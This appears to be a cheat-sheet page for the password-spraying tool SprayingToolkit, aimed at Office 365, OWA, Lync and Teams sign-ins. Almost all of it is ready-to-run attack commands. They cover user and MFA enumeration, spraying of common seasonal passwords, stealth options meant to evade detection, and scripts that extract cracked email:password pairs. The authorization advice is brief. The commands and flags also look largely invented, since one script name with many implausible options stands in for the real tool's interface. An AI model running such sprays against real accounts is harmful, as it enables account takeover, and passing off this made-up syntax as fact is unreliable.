SprayingToolkit
Overview
Seção intitulada “Overview”SprayingToolkit is a comprehensive Python-based password spraying framework designed specifically for cloud and hybrid environments. It supports multiple protocols and targets including Lync/Skype for Business, Outlook Web Access (OWA), Office 365, Microsoft Teams, and Azure endpoints. The toolkit provides protocol-specific spray capabilities with account lockout protections and integration with threat intelligence sources.
Prerequisites
Seção intitulada “Prerequisites”- Python 3.7+
- Network connectivity to target endpoints
- Valid domain or email addresses
- Wordlist or password file
- Understanding of target authentication mechanisms
- Coordination with Blue Team for detection monitoring
Installation
Seção intitulada “Installation”Linux/macOS
Seção intitulada “Linux/macOS”# Clone repository
git clone https://github.com/byt3bl33d3r/SprayingToolkit.git
cd SprayingToolkit
# Create virtual environment
python3 -m venv venv
source venv/bin/activate
# Install dependencies
pip install -r requirements.txt
# Verify installation
python3 sprayingtoolkit.py --helpWindows (PowerShell)
Seção intitulada “Windows (PowerShell)”# Clone repository
git clone https://github.com/byt3bl33d3r/SprayingToolkit.git
cd SprayingToolkit
# Create virtual environment
python -m venv venv
.\venv\Scripts\Activate.ps1
# Install dependencies
pip install -r requirements.txt
# Run toolkit
python sprayingtoolkit.py --helpDocker Installation
Seção intitulada “Docker Installation”# Build Docker image
docker build -t sprayingtoolkit .
# Run container
docker run -it sprayingtoolkit --help
# Volume mount for results
docker run -v /path/results:/results sprayingtoolkitCore Spray Modules
Seção intitulada “Core Spray Modules”Office 365 Spraying
Seção intitulada “Office 365 Spraying”# Basic O365 spray
python3 sprayingtoolkit.py -t O365 -u users.txt -p password123
# Use email list
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123
# Spray with multiple passwords
python3 sprayingtoolkit.py -t O365 -e emails.txt -p passwords.txt --wordlist
# Include delay for detection avoidance
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 --delay 5
# Query valid email addresses first
python3 sprayingtoolkit.py -t O365 -e emails.txt --enum-usersOWA (Outlook Web Access) Spraying
Seção intitulada “OWA (Outlook Web Access) Spraying”# Basic OWA spray against on-premises server
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com -u users.txt -p password123
# OWA with NTLM authentication
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com -d EXAMPLE.COM -u users.txt -p password123
# Test connectivity first
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com --test-connection
# Extract OWA version
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com --version-checkLync/Skype for Business Spraying
Seção intitulada “Lync/Skype for Business Spraying”# Basic Lync spray
python3 sprayingtoolkit.py -t Lync -u users.txt -p password123 --server lync.example.com
# Auto-discover Lync server
python3 sprayingtoolkit.py -t Lync -u users.txt -p password123 --auto-discover
# Spray with SIP addresses
python3 sprayingtoolkit.py -t Lync -e sip_addresses.txt -p password123
# Test Lync connectivity
python3 sprayingtoolkit.py -t Lync --server lync.example.com --test-connectionTeams/Skype Spraying
Seção intitulada “Teams/Skype Spraying”# Microsoft Teams spray
python3 sprayingtoolkit.py -t Teams -e emails.txt -p password123
# Teams with federation
python3 sprayingtoolkit.py -t Teams -e emails.txt -p password123 --federation-enabled
# Spray with specific tenant
python3 sprayingtoolkit.py -t Teams -e emails.txt -p password123 --tenant example.comCommon Commands
Seção intitulada “Common Commands”| Command | Description |
|---|---|
sprayingtoolkit.py -t O365 -e EMAILS -p PASSWORD | Spray Office 365 |
sprayingtoolkit.py -t OWA --url URL -u USERS -p PASS | Spray OWA server |
sprayingtoolkit.py -t Lync -u USERS -p PASS | Spray Lync/SfB |
sprayingtoolkit.py -t Teams -e EMAILS -p PASS | Spray Teams/O365 |
sprayingtoolkit.py -t [TARGET] -p passwords.txt --wordlist | Multi-password spray |
sprayingtoolkit.py -t [TARGET] --delay 5 | Add delay between attempts |
sprayingtoolkit.py -t [TARGET] --enum-users | Enumerate valid users |
sprayingtoolkit.py -t [TARGET] --output results.txt | Save results |
sprayingtoolkit.py -t [TARGET] --lockout-threshold 5 | Set lockout protection |
sprayingtoolkit.py -t [TARGET] --verbose | Detailed output |
Advanced Spray Strategies
Seção intitulada “Advanced Spray Strategies”Intelligent Spray with Lockout Protection
Seção intitulada “Intelligent Spray with Lockout Protection”# Query lockout policy and spray safely
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--check-lockout-policy \
--delay 60 \
--safety-margin 2
# Set specific lockout threshold
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--lockout-threshold 5 \
--lockout-window 30Multi-Protocol Sequential Spraying
Seção intitulada “Multi-Protocol Sequential Spraying”# Spray one protocol, then another
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com -u users.txt -p password123 \
--output owa_results.txt
python3 sprayingtoolkit.py -t Lync -u users.txt -p password123 \
--server lync.example.com \
--output lync_results.txt
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--output o365_results.txtUser Enumeration Before Spray
Seção intitulada “User Enumeration Before Spray”# Enumerate valid users from O365
python3 sprayingtoolkit.py -t O365 -e all_emails.txt --enum-users \
--output valid_users.txt
# Enumerate OWA valid accounts
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt --enum-users
# Use enumerated list for spray
python3 sprayingtoolkit.py -t O365 -e valid_users.txt -p password123Common Password Dictionary Spray
Seção intitulada “Common Password Dictionary Spray”# Common passwords from curated list
python3 sprayingtoolkit.py -t O365 -e emails.txt \
-p "Password123!,Welcome2024,Spring2024,Company123" \
--wordlist
# Seasonal passwords
python3 sprayingtoolkit.py -t O365 -e emails.txt \
-p passwords_spring.txt \
--wordlist \
--delay 120User Enumeration Techniques
Seção intitulada “User Enumeration Techniques”Office 365 User Enumeration
Seção intitulada “Office 365 User Enumeration”# Enumerate valid Office 365 accounts
python3 sprayingtoolkit.py -t O365 -e email_list.txt --enum-users
# Use Autodiscover for enumeration
python3 sprayingtoolkit.py -t O365 -e email_list.txt --enum-autodiscover
# Validate email format
python3 sprayingtoolkit.py -t O365 -e email_list.txt --enum-validate-only
# Export valid users
python3 sprayingtoolkit.py -t O365 -e email_list.txt --enum-users \
--output valid_o365_users.txtOWA User Enumeration
Seção intitulada “OWA User Enumeration”# Enumerate OWA valid users
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt --enum-users
# Identify user information
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt --enum-detailed
# Extract user attributes
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt --enum-attributesLync/Skype User Enumeration
Seção intitulada “Lync/Skype User Enumeration”# Enumerate Lync users
python3 sprayingtoolkit.py -t Lync --server lync.example.com \
-u users.txt --enum-users
# Enumerate SIP addresses
python3 sprayingtoolkit.py -t Lync --server lync.example.com \
--enum-sip-addresses
# Identify Lync enabled users
python3 sprayingtoolkit.py -t Lync --auto-discover --enum-usersConfiguration
Seção intitulada “Configuration”Configuration File
Seção intitulada “Configuration File”# Create spray configuration
cat > spray_config.yaml << 'EOF'
# Target configuration
target: O365
protocol: Office365
# User/Email configuration
users_file: users.txt
emails_file: emails.txt
# Spray parameters
password: password123
wordlist: false
passwords_file: null
# Safety parameters
delay_between_attempts: 5
delay_per_password: 120
lockout_threshold: 5
lockout_observation_window: 30
safety_check_enabled: true
# Enumeration
enum_users: false
enum_mode: autodiscover
# Output
output_file: spray_results.txt
output_format: text
verbose: true
# Protocol specific
ssl_verify: true
timeout: 5
proxy: null
EOF
# Use configuration
python3 sprayingtoolkit.py --config spray_config.yamlEnvironment Variables
Seção intitulada “Environment Variables”# Set target parameters
export SPRAY_TARGET=O365
export SPRAY_EMAILS_FILE=emails.txt
export SPRAY_PASSWORD=password123
export SPRAY_DELAY=5
export SPRAY_LOCKOUT_THRESHOLD=5
# Run with environment
python3 sprayingtoolkit.pyOutput and Analysis
Seção intitulada “Output and Analysis”Result Formats
Seção intitulada “Result Formats”# Text output
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--output results.txt \
--format text
# JSON output for processing
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--output results.json \
--format json
# CSV output
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--output results.csv \
--format csvParsing Results
Seção intitulada “Parsing Results”# Extract successful credentials from text
grep "SUCCESS\|VALID\|FOUND" spray_results.txt
# Extract successful accounts
grep -o ".*SUCCESS" spray_results.txt | cut -d' ' -f1 > valid_accounts.txt
# Count successes by protocol
echo "=== Results Summary ==="
echo "O365: $(grep -c "O365.*SUCCESS" spray_results.txt)"
echo "OWA: $(grep -c "OWA.*SUCCESS" spray_results.txt)"
echo "Lync: $(grep -c "Lync.*SUCCESS" spray_results.txt)"JSON Analysis
Seção intitulada “JSON Analysis”# Extract successful credentials
cat results.json | jq '.successful_attempts[]'
# Get email/password combinations
cat results.json | jq -r '.successful_attempts[] | "\(.email):\(.password)"'
# Filter by target type
cat results.json | jq '.[] | select(.target == "O365")'
# Statistics
cat results.json | jq '{
total: (.successful_attempts | length),
by_target: (group_by(.target) | map({(.[0].target): length}))
}'Protocol-Specific Techniques
Seção intitulada “Protocol-Specific Techniques”Office 365 Specific
Seção intitulada “Office 365 Specific”# Use Office 365 REST API enumeration
python3 sprayingtoolkit.py -t O365 -e emails.txt \
--api-enum \
--api-key your_key
# Spray with specific tenant
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--tenant example.onmicrosoft.com
# Check MFA status (enumeration)
python3 sprayingtoolkit.py -t O365 -e emails.txt --enum-mfa-statusOWA Specific
Seção intitulada “OWA Specific”# OWA Forms-Based Authentication
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt -p password123 \
--auth-method forms
# OWA NTLM Authentication
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-d DOMAIN -u users.txt -p password123 \
--auth-method ntlm
# OWA with custom headers
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt -p password123 \
--header "X-Custom: value"Lync Specific
Seção intitulada “Lync Specific”# Lync with auto-discovery
python3 sprayingtoolkit.py -t Lync -u users.txt -p password123 \
--auto-discover \
--internal-only
# Lync with SIP
python3 sprayingtoolkit.py -t Lync \
--sip-addresses sips.txt -p password123
# Lync with specific pool
python3 sprayingtoolkit.py -t Lync -u users.txt -p password123 \
--pool lync-pool.example.comIntegration with Other Tools
Seção intitulada “Integration with Other Tools”Combine with User Enumeration Tools
Seção intitulada “Combine with User Enumeration Tools”# Use email enumeration tool output
./email_hunter.sh example.com > emails.txt
# Spray with found emails
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123Integrate with MailSniper
Seção intitulada “Integrate with MailSniper”# Export valid credentials
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--output valid_creds.txt
# Use with MailSniper for email enumeration
Invoke-MailSniper -EmailList valid_creds.txt -OutFile mail_results.txtIntegration with Azure/Office 365 Tools
Seção intitulada “Integration with Azure/Office 365 Tools”# Connect with found credentials to Azure
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--output azure_creds.txt
# Use credentials with AzureAD module
# Import-Module AzureAD
# $cred = Get-Credential (use found credentials)Safety and Stealth
Seção intitulada “Safety and Stealth”Account Lockout Protection
Seção intitulada “Account Lockout Protection”# Query AD lockout policy
python3 sprayingtoolkit.py -t O365 -e emails.txt \
--check-lockout-policy
# Conservative spray with safety margin
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--lockout-threshold 5 \
--safety-margin 3 \
--delay 120
# Test without actual attempts
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 --dry-runStealth Techniques
Seção intitulada “Stealth Techniques”# Randomize user order
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--randomize-order
# Variable delays
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--delay 60 \
--jitter 20
# Slow spray mode
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--slow-mode \
--threads 1Troubleshooting
Seção intitulada “Troubleshooting”Common Issues
Seção intitulada “Common Issues”# Connection timeout
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--timeout 10 \
--retry 3
# SSL certificate errors
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt -p password123 \
--ssl-verify false
# Proxy issues
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--proxy http://proxy.example.com:8080Debugging
Seção intitulada “Debugging”# Enable debug logging
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--debug \
--log-file debug.log
# Test single target
python3 sprayingtoolkit.py -t O365 -e test@example.com -p password123 \
--verbose
# Check tool version
python3 sprayingtoolkit.py --versionBest Practices
Seção intitulada “Best Practices”- Written Authorization: Obtain approval before spraying any credentials
- Lockout Awareness: Query and respect lockout policies
- Coordination: Notify Blue Team of spray timing and scope
- Delays: Implement appropriate delays between attempts
- Testing: Test enumeration before spray campaigns
- Documentation: Record all attempts and results
- Protocol Knowledge: Understand target authentication before spraying
- Cleanup: Document and remediate any lock-outs
- Safe Hours: Schedule sprays during pre-coordinated windows
- Alternative Methods: Consider authorized password reset testing
Practical Assessment Workflows
Seção intitulada “Practical Assessment Workflows”Comprehensive Cloud Assessment
Seção intitulada “Comprehensive Cloud Assessment”# Phase 1: Enumerate valid users
python3 sprayingtoolkit.py -t O365 -e all_emails.txt --enum-users \
--output phase1_valid_users.txt
# Phase 2: Check MFA status
python3 sprayingtoolkit.py -t O365 -e phase1_valid_users.txt --enum-mfa-status \
--output phase2_mfa_status.txt
# Phase 3: Spray with common passwords
python3 sprayingtoolkit.py -t O365 -e phase1_valid_users.txt \
-p common_passwords.txt --wordlist \
--output phase3_spray_results.txt
# Phase 4: Multi-protocol spray
python3 sprayingtoolkit.py -t Lync -u phase1_valid_users.txt -p common_passwords.txt \
--output phase4_lync_results.txtResources
Seção intitulada “Resources”- GitHub: https://github.com/byt3bl33d3r/SprayingToolkit
- Office 365 Security: https://learn.microsoft.com/en-us/office365/
- OWA Documentation: https://learn.microsoft.com/en-us/exchange/clients/outlook-on-the-web/outlook-on-the-web
- Lync/Teams: https://learn.microsoft.com/en-us/microsoftteams/
Summary
Seção intitulada “Summary”SprayingToolkit provides comprehensive multi-protocol password spraying capabilities for cloud and hybrid environments. Proper authorization, safety mechanisms, and coordinated testing are essential for effective and responsible use during authorized security assessments.